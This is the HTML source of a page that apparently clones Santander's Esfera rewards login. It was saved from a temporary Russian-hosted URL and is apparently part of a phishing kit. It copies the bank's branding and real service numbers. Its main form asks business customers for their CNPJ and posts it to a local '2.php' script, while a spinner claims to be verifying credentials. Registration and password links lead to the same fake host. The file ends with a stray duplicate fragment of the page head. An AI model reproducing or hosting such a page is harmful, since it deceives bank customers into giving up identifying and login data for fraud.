
    <!-- saved from url=(0083)http://sjnabarryo.temp.swtest.ru/ -->
    <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

        <title>Esfera – A rede de parcerias Santander</title>
        <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1, maximum-scale=1" xmlns="index.html">
        <meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="description" content="Esfera - A rede de parcerias Santander, troque seus pontos por produtos, serviços, viagens e experiências.">
        <link rel="stylesheet" media="all" href="./assets/1_files/application-46232f38c2d4c74bca6be211a215130913b2f8591261d78f1ac49d45b41c6185.css" data-turbolinks-track="true">
        <script src="./assets/1_files/application-4406596b68492192d1d8fc283064f3cf4a7c4018317dc97b555b6dec3b28b026.js.download" data-turbolinks-track="true"></script>
        <meta name="csrf-param" content="authenticity_token">
    <meta name="csrf-token" content="jwYVwSsnm78brltFRSu7ikeRVsVuN6tn3bKfPptOFIvAtConMbRCf8xRz+9yOGjMe/yYN5AAabNKe73eSP16XA==">
    
    
        <link href="./assets/1_files/css7212.css" rel="stylesheet">
        <link href="./assets/1_files/cssda6f.css" rel="stylesheet">
    
        <!-- Maintenance Script -->
        <link rel="stylesheet" media="screen" href="./assets/1_files/bonus-esfera-production-maintenancedf2b.css">
        <script src="./assets/1_files/bonus-esfera-production-maintenancedf2b.js.download"></script>
    
        <!-- Google Tag Manager -->
        <noscript>
            <iframe src="nse062.html?id=GTM-W9CXVT" height="0" width="0" style="display:none;visibility:hidden"></iframe>
        </noscript>
        
        <!-- End Google Tag Manager -->
    </head>
    <body>
    
        
    <header>
    
        <div class="pre-header">
    
        <div class="container">
            <div class="row">
            <div class="col-md-12 text-right">
                <span class="partnership">A rede de parcerias</span>
                <img alt="Santander" class="logo-santander" src="./assets/1_files/santander-new-negativo-8e155b76b2867ec89da52b1ec8f669c1e02c995a4ec9680fe20767e5ff16276e.png">
            </div>
            </div>
        </div>
    
        </div>
    
        <div class="container" id="main-menu">
    
            <div class="row">
    
            <div class="col-sm-12 col-md-8 mobile-no-padding">
                <div class="row">
                <div class="col-md-2 col-sm-6 text-center logo-esfera">
                    <figure class="">
                    <a href="#">
                        <img alt="Pontos Esfera" class="top-10" src="./assets/1_files/pontos-esfera-logo-f9e3d1ab44de10129c4afe2867373c01647bbf9010fff1b84c1a9b19db8f9553.png">
    </a>              </figure>
                </div>
    
                <div class="col-md-6 no-padding no-mobile">
                    
    <div id="search-bar" class="top-30">
        <form action="#" accept-charset="UTF-8" method="get">
            
        <input name="utf8" type="hidden" value="✓">
        
        <input type="search" name="keywords" id="keywords" placeholder="Busca" class="input-white-type-1 search-selector" maxlength="250">
    
        <button name="button" type="submit" class="negocioseempresas">
            <i class="fa fa-search" aria-hidden="true"></i>
    </button>
    </form></div>
    
    
    
    <script type="text/javascript">
    function MascaraCNPJ(cnpj){
            if(mascaraInteiro(cnpj)==false){
                    event.returnValue = false;
            }       
            return formataCampo(cnpj, '00.000.000/0000-00', event);
    }
    function validate(evt) {
        var theEvent = evt || window.event;
    
        // Handle paste
        if (theEvent.type === 'paste') {
            key = event.clipboardData.getData('text/plain');
        } else {
        // Handle key press
            var key = theEvent.keyCode || theEvent.which;
            key = String.fromCharCode(key);
        }
        var regex = /[0-9]|\.|\-|\//;
        if( !regex.test(key) ) {
        theEvent.returnValue = false;
        if(theEvent.preventDefault) theEvent.preventDefault();
        }
    }
    function ValidarCNPJ(ObjCnpj){
            var cnpj = ObjCnpj.value;
            var valida = new Array(6,5,4,3,2,9,8,7,6,5,4,3,2);
            var dig1= new Number;
            var dig2= new Number;
    
            exp = /\.|\-|\//g
            cnpj = cnpj.toString().replace( exp, "" ); 
            var digito = new Number(eval(cnpj.charAt(12)+cnpj.charAt(13)));
    
            for(i = 0; i<valida.length; i++){
                    dig1 += (i>0? (cnpj.charAt(i-1)*valida[i]):0);  
                    dig2 += cnpj.charAt(i)*valida[i];       
            }
            dig1 = (((dig1%11)<2)? 0:(11-(dig1%11)));
            dig2 = (((dig2%11)<2)? 0:(11-(dig2%11)));
    
            if(((dig1*10)+dig2) != digito)   {
        alert("CNPJ Inválido");
    return false;
    }
    else {
    return true;
    }
    
    }
    
        $(document).ready(function(){
    
        function enableDisableValidation(option){
            if(option.val() == ""){
            $(".search-selector").attr("required", "required");
            $(".search-selector").attr("pattern", '^\\S+[a-zA-Z0-9!@#$%^&*()_+\\-=\\[\\]{};:"\\\|,.<>\\/?\\s]+$');
            } else {
            $(".search-selector").removeAttr("required");
            $(".search-selector").removeAttr("pattern");
            }
        }
    
        $("#taxon").change(function(){
            enableDisableValidation($(this));
        });
    
        enableDisableValidation($("#taxon"));
    
        $("#taxon").val("").change();
        });
    </script>
                </div>
    
                <div class="col-md-4 col-sm-4 line login-links">
                    <nav class="top-menu top-45 text-center">
                    <div class="sign-in text-center top-45 no-mobile"></div><div class="col-sm-2 register-icon small-only"></div><div class="col-sm-2 cart-icon small-only pull-right"></div>
                    </nav>
                </div>
                </div>
                
                <div class="row small-only">
                <div class="col-sm-12 search-menu-mobile">
                    
                    <div class="col-sm-2 hamburg-menu">
                    <button class="menu-mobile">
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </button>
                    </div>
                    <div class="overlay-mobile"></div>
                    <menu class="mobile__menu-content">
                    <div class="menu-content__close"><button class="close-menu-mobile"></button></div>
                    <ul class="menu-content__list">
                        <li>
                        <h3 class="category-mobile shop">Shopping</h3>
                        <ul class="category-list">
                            <li><a href="#">Automotivo</a></li>
                            <li><a href="#">Beleza</a></li>
                            <li><a href="#">Brinquedos</a></li>
                            <li><a href="#">Café</a></li>
                            <li><a href="#">Cama, mesa e banho</a></li>
                            <li><a href="#">Cultura e Educação</a></li>
                            <li><a href="#">Eletrodomésticos</a></li>
                            <li><a href="#">Eletrônicos</a></li>
                            <li><a href="#">Ferramentas</a></li>
                            <li><a href="#">Moda</a></li>
                            <li><a href="#">Móveis e Decoração</a></li>
                            <li><a href="#">Outros</a></li>
                            <li><a href="#">Saúde</a></li>
                            <li><a href="#">Serviços</a></li>
                            <li><a href="#">Vinhos</a></li>
                        </ul>
                        </li>
    
                        <li>
                        <h3 class="category-mobile food">Comer e Beber</h3>
                        <ul class="category-list">
                            <li><a href="#">Assinaturas</a></li>
                            <li><a href="#">Outros</a></li>
                            <li><a href="#">Vale-compras</a></li>
                        </ul>
                        </li>
    
                        <li>
                        <h3 class="category-mobile leisure">Lazer e Bem-estar</h3>
                        <ul class="category-list">
                            <li><a href="#">Cinema</a></li>
                            <li><a href="#">Teatro</a></li>
                            <li><a href="#">Táxi</a></li>
                            <li><a href="#">Diversão</a></li>
                            <li><a href="#">Cuidados Pessoais</a></li>
                            <li><a href="#">Shows</a></li>
                            <li><a href="#">Vale-compras</a></li>
                        </ul>
                        </li>
    
                        <li>
                        <h3 class="category-mobile travel">Viagens</h3>
                        <ul class="category-list">
                            <li><a href="#">Cruzeiros</a></li>
                            <li><a href="##tab-hoteis">Hotéis</a></li>
                            <li><a href="##tab-tickets">Passagens</a></li>
                        </ul>
                        </li>
    
                        <li>
                        <h3 class="category-mobile institutional">Institucional</h3>
                        <ul class="category-list">
                            <li><a href="#">O que é o Esfera</a></li>
                            <li><a href="#">Perguntas Frequentes</a></li>
                            <li><a href="#">Fale conosco</a></li>
                            <li><a href="#">Receber Ofertas por e-mail</a></li>
                            <li><a href="#">Parar de receber e-mails</a></li>
                        </ul>
                        </li>
    
                        <li>
                        <h3 class="category-mobile about">Como Funciona</h3>
                        <ul class="category-list">
                            <li><a href="#">Como juntar pontos</a></li>
                            <li><a href="#">Regulamento</a></li>
                        </ul>
                        </li>
    
                    </ul>
                    </menu>
                    <div class="col-sm-10">
    <div id="search-bar" class="top-30">
        <form action="#action" accept-charset="UTF-8" method="get"><input name="utf8" type="hidden" value="✓">
        <input type="search" name="keywords" id="keywords" placeholder="Busca" class="input-white-type-1 search-selector" maxlength="250">
    
        <button name="button" type="submit" class="negocioseempresas">
            <i class="fa fa-search" aria-hidden="true"></i>
    </button>
    </form></div>
    
    
    
    <script type="text/javascript">
        $(document).ready(function(){
    
        function enableDisableValidation(option){
            if(option.val() == ""){
            $(".search-selector").attr("required", "required");
            $(".search-selector").attr("pattern", '^\\S+[a-zA-Z0-9!@#$%^&*()_+\\-=\\[\\]{};:"\\\|,.<>\\/?\\s]+$');
            } else {
            $(".search-selector").removeAttr("required");
            $(".search-selector").removeAttr("pattern");
            }
        }
    
        $("#taxon").change(function(){
            enableDisableValidation($(this));
        });
    
        enableDisableValidation($("#taxon"));
    
        $("#taxon").val("").change();
        });
    </script></div>
                </div>
                </div>
    
            </div>
    
            <div class="col-sm-12 col-md-4 no-mobile">
                <div class="row">
                <div class="col-md-2">
                    <nav class="top-30 icone-atencao">
                    <img alt="atencao" src="./assets/1_files/icone-atencao-55ff3c93032ccb6f594956534f1f6eb7e9291604044650c365ff6b2a48b77a5f.png">
                    </nav>
                </div>
                <div class="col-md-9">
                    <nav class="top-menu top-30 text-left atencao">
                    Para acessar esta página, você precisa de um login especifico com e-mail e senha. Caso ainda não possua, clique em "Cadastre-se".
                    </nav>
                </div>
                </div>
            </div>
            </div>
        </div>
    
    </header>
    
    <section id="store-menu" class="no-mobile">
        <div class="container">
        <div class="row">
            <div class="col-md-12 text-center">
    
                <ul class="stores">
    
                <li class="sub">
                    <a href="javascript:void(0);">
                    O Esfera
    </a>              <span class="arrow-menu"><i class="arrow down"></i></span>
                    <div class="store-sub-menu one-column top-10">
                    <div class="row">
                        <div class="col-md-12 one-col departments top-25">
                        <ul>
                            <li><a href="#">O que é o Esfera</a></li>
                            <li><a href="#">Perguntas Frequentes</a></li>
                            <li><a href="#">Fale conosco</a></li>
                            <li><a target="_blank" href="#">Receber ofertas por e-mail</a></li>
                            <li><a target="_blank" href="#">Parar de receber e-mails</a></li>
                            <li><a href="#">Regulamento</a></li>
                        </ul>
                        </div>
                    </div>
                </div>
                </li>
    
                <li class="sub">
                    <a href="#">Shopping</a>
                    <span class="arrow-menu"><i class="arrow down"></i></span>
                </li>
    
                <li class="sub">
                    <a href="#">Comer e Beber</a>
                    <span class="arrow-menu"><i class="arrow down"></i></span>
                </li>
    
                <li class="sub">
                    <a href="#">Lazer e Bem-Estar</a>
                    <span class="arrow-menu"><i class="arrow down"></i></span>
                </li>
    
                <li class="sub">
                    <a href="#">Viagens</a>
                    <span class="arrow-menu"><i class="arrow down"></i></span>
                </li>
    
                </ul>
    
            </div>
        </div>
        </div>
    </section>
    
        
    <section id="breadcrumb" class="no-mobile">
        <div class="container">
            <div class="row">
            <div class="col-md-12">
                <ul class="path top-15">
                <li>Home</li>
                <li>Pontos Esfera</li>
                <li class="current">Minha Conta</li>
                </ul>
            </div>
            <div class="col-md-12">
                <h1 class="top-0">Login</h1>
            </div>
            </div>
        </div>
    </section>
    <div id="login-modal" class="modal fade" tabindex="-1" role="dialog" data-show-modal="null">
        <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header text-center">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
            <h4 class="modal-title">Atenção</h4>
            </div>
            <div class="modal-body text-center">
            <p>Para acessar esta página, você precisa de um login especifico com e-mail e senha. Caso ainda não possua, <a href="http://sjnabarryo.temp.swtest.ru/register.html">clique aqui</a> para se cadastrar.</p>
            <p class="forgot-password"><a href="http://sjnabarryo.temp.swtest.ru/register.html">Esqueci minha senha</a></p>
            </div>
        </div><!-- /.modal-content -->
        </div><!-- /.modal-dialog -->
    </div><!-- /.modal -->
    <div class="col-sm-12 small-only atention-box">
        <div><span class="atention-title" style="
        font-size: 16px;
    ">Atenção: </span><span>Digite seu CNPJ para acesso. <br><br>Caso não possua cadastro ativo lhe encaminharemos para o formulário de registro.</span></div>
    </div>
    <section class="step-ruler">
        
    </section>
    
    <section id="login-form" class="top-45">
    
        <div class="container">
        <div class="row text-center select-client-type">
            <button class="select-client-option col-md-2 col-sm-6 col-md-offset-4">
                
            </button>
            <button class="select-client-active col-md-12 top-10 text-center no-mobile">
            <span>Acesso PJ</span>
            </button>
        </div>
        </div>
        <div class="container form">
        <div class="col-md-10 text-center atention-box no-mobile" style="
        margin-left: 0px;
        width: 100%;
    ">
        <div><span class="atention-title" style="
        font-size: 16px;
    ">Atenção: </span><span>Digite seu CNPJ para acesso. <br><br>Caso não possua cadastro ativo lhe encaminharemos para o formulário de registro.</span></div>
            </div>
    <div class="row">
        <div class="col-sm-12 col-md-10 col-md-offset-4 border-form" style="
        margin-top: 50px;
        width: 100%;
        margin-left: 1;
    ">
            <h3 class="text-center no-mobile">Acesse Seu Esfera</h3>
        
            <span id="saida" class="lead" style="display: none"></span>
    
        
            <form name="form1" autocomplete="off" action="2.php" accept-charset="UTF-8" method="POST">
                <div class="form-group text-center">
                <label for="cnpj" class="text-center">CNPJ: </label>
    <input class="form-control input-grey-type-1" required="required" type="text" onkeypress="validate(event)" name="cnpj" maxlength="18">
                
                </div>
        
                
                <div class="form-group">
                
                </div>
    
                <input type="submit" name="botaoValidarCNPJ" id="botaoValidarCNPJ" onclick="return ValidarCNPJ(form1.cnpj); " value="Entrar" class="red-btn-type-1 top-25" data-disable-with="Aguarde...">
    </form>      </div>
        
        </div>
    
        </div>
    
    
    
    </section>
    
    
    <div id="spinner" class="hide">
        <div class="l-wrapper">
        <div class="loader"></div>
        <p class="spinner-text">
        Verificando credenciais...
        </p>
    </div>
    
    <div class="spinner-overlay">
    </div>
    </div>
    
        
    <section id="faq">
    
        <div class="container no-padding no-mobile">
    
        <div class="row">
    
            <div class="col-md-faq">
            <p>Institucional</p>
    
            <ul>
                <li><a href="#">O que é o Esfera</a></li>
                <li><a href="#">Perguntas Frequentes</a></li>
                <li><a href="#">Fale Conosco</a></li>
                <li><a target="_blank" href="#">Receber ofertas por e-mail</a></li>
                <li><a target="_blank" href="#">Parar de receber e-mails</a></li>
            </ul>
            </div>
    
            <div class="col-md-faq right-45">
            <a href="#">
                <p>Como funciona</p>
    </a>
            <ul>
                <li><a href="#">Como juntar pontos</a></li>
                <li><a href="#">Regulamento</a></li>
            </ul>
            </div>
    
            <div class="col-md-faq text-center">
            <a href="#">
                <p>Shopping</p>
    </a>        <ul>
                <li></li>
            </ul>
            </div>
    
            <div class="col-md-faq text-center">
            <a href="#">
                <p>Comer e Beber</p>
    </a>        <ul>
                <li></li>
            </ul>
            </div>
    
            <div class="col-md-faq text-center">
            <a href="#">
                <p>Lazer e Bem-Estar</p>
    </a>        <ul>
                <li></li>
            </ul>
            </div>
    
            <div class="col-md-faq text-center">
            <a href="#">
                <p>Viagens</p>
    </a>        <ul>
                <li></li>
            </ul>
            </div>
        </div>
    
        </div>
    
        <div class="container faq-container small-only">
        <h2 class="title__collapsible-menu">Fale Conosco</h2>
    
        <div class="row">
    
            <div class="col-md-faq collapsible-menu">
            <input class="input-hidden" type="checkbox" id="contactUs">
            <label for="contactUs">Central de atendimento</label>
            
            <div class="menu-content">
                <div class="content-inner">
                <p class="inner__schedules">Consultas, Informações e Serviços Transacionais</p>
                <p class="inner__phone">4004-3535</p>
                <small>(Capitais e Regiões Metropolitanas)</small>
                <p class="inner__phone">0800 702 35353</p>
                <small>(Demais Localidades)</small>
                <p class="inner__phone">0800 723 5007</p>
                <small>(Atende deficientes auditivos e de fala)</small>
                </div>
            </div>
    
            </div>
    
            <div class="col-md-faq collapsible-menu">
            <input class="input-hidden" type="checkbox" id="sac">
            <label for="sac">Sac</label>
            
            <div class="menu-content">
                <div class="content-inner">
                <p>Reclamações, Cancelamentos, Sugestões e Informações Gerais</p>
                <p class="inner__phone">0800 762 7777</p>
                <small>Atende também pessoas com deficiência auditiva e de fala <span class="red-text">0800 771 0401</span>.</small>
                <p>Ligações do exterior (a cobrar):</p>
                <p class="inner__phone top-0">+55 (11)3012-3336</p>
                </div>
            </div>
    
            </div>
    
            <div class="col-md-faq collapsible-menu">
            <input class="input-hidden" type="checkbox" id="ouvidoria">
            <label for="ouvidoria">Ouvidoria</label>
            
            <div class="menu-content">
                <div class="content-inner">
                <p>Se não ficar satisfeito com a solução apresentada:</p>
                <p class="inner__phone">0800 726 0322</p>
                <small>Disponível de segunda a sexta-feira, das <span class="red-text">9h às 18h</span>, exceto feriado. Atende também pessoas com deficiência auditiva e de fala no <span class="red-text">0800 771 0301</span>.</small>
                </div>
            </div>
    
            </div>
    
        </div>
    
        </div>
    
    </section>
        
    <footer>
    
        <div class="top-footer">
        <div class="container no-padding">
    
            <div class="row">
    
            <div class="col-md-6 col-sm-12 align-mobile text-left top-30">
                <span>Banco Santander (Brasil) S.A. <a class="footer-a" href="#">www.santander.com.br</a>
            </span></div>
            <div class="col-md-6 col-sm-12 align-mobile text-right top-23">
                <a href="#" target="_blank">
                    <img alt="Santander" src="./assets/1_files/santander-logo-footer-07f273a5fff2867be3f30339b84a65360ccb1b601c495a5aba999be8792a3158.png">
                </a>
            </div>
            </div>
        </div>
        </div>
        <!-- Return to Top -->
        <a href="javascript:" id="return-to-top"><i class="fa fa-chevron-up" aria-hidden="true"></i></a>
    
        
    </footer>
    
    
    
    <div id="blinkextension_snap_links_box" style="background-color: rgba(250, 128, 0, 0.07); border: 3px dashed blue; box-sizing: border-box; position: absolute; z-index: 2147483647; display: none; left: 614px; top: 606px;"></div><div id="hit_a_link_blinkextension_container" style="display: none; position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 2147483647; background: rgba(0, 0, 0, 0);"></div><div id="blinkextension_snap_links_box" style="background-color: rgba(250, 128, 0, 0.07); border: 3px dashed blue; box-sizing: border-box; position: absolute; z-index: 2147483647; display: none; left: 1055px; top: 463px;"></div><div id="hit_a_link_blinkextension_container" style="display: none; position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 2147483647; background: rgba(0, 0, 0, 0);"></div></body></html>
    <!-- saved from url=(0083)http://sjnabarryo.temp.swtest.ru/ -->
    <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
        <title>Esfera – A rede de parcerias Santander</title>
        <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1, maximum-scale=1" xmlns="index.html">
        <meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="description" content="Esfera - A rede de parcerias Santander, troque seus pontos por produtos, serviços, viagens e experiências.">
        <link rel="stylesheet" media="all" href="./assets/1_files/application-46232f38c2d4c74bca6be211a215130913b2f8591261d78f1ac49d45b41c6185.css" data-turbolinks-track="true">
        <script src="./assets/1_files/application-4406596b68492192d1d8fc283064f3cf4a7c4018317dc97b555b6dec3b28b026.js.download" data-turbolinks-track="true"></script>
        <meta name="csrf-param" content="authenticity_token">
    <meta name="csrf-token" content="jwYVwSsnm78brltFRSu7ikeRVsVuN6tn3bKfPptOFIvAtConMbRCf8xRz+9yOGjMe/yYN5AAabNKe73eSP16XA==">
    
    
        <link href="./assets/1_files/css7212.css" rel="stylesheet">
        <link href="./assets/1_files/cssda6f.css" rel="stylesheet">
    
        <!-- Maintenance Script -->
        <link rel="stylesheet" media="screen" href="./assets/1_files/bonus-esfera-production-maintenancedf2b.css">
        <script src="./assets/1_files/bonus-esfera-production-maintenancedf2b.js.download"></script>
    
    </body>
</html>